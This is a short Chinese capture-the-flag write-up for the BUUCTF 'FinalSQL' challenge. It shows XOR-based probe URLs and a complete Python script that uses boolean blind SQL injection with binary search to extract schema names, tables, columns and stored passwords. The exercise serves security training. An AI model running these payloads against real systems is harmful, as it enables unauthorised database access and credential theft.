布尔盲注题目

布尔盲注——[极客大挑战 2019]FinalSQL

1.利用异或判断注入点

http://30405780-8762-480c-a9ec-5fe5a07033ad.node5.buuoj.cn:81/search.php?id=1^0  #结果为1,回显正确
http://30405780-8762-480c-a9ec-5fe5a07033ad.node5.buuoj.cn:81/search.php?id=1^1  #结果为0.回显错误

2.写exp

利用二分法进行bool盲注

#二分法进行布尔盲注
import requests
import time

url = "http://30405780-8762-480c-a9ec-5fe5a07033ad.node5.buuoj.cn:81/search.php?"
temp = {"id": ""}
column = ""
for i in range(1, 1000):
    time.sleep(0.06)
    # 32-128的ascii码为可见字符
    low = 32
    high = 128
    mid = (low + high) // 2
    #循环的边界条件是low<high，如果low=high了就会陷入死循环
    while (low < high):
        # 库名
        # temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
        # 表名
        # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i,mid)
        # 列名
        # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # 内容
        temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid   #因为当正确的值小于等于mid时，会移动high
        mid = (low + high) // 2

    #最后循环结束时，若找到，则mid=low=high
    if (mid == 32 or mid == 127):   #长度边界
        break
    column += chr(mid)   #chr函数将ascii码转换为字符
    print(column)

print("All:", column)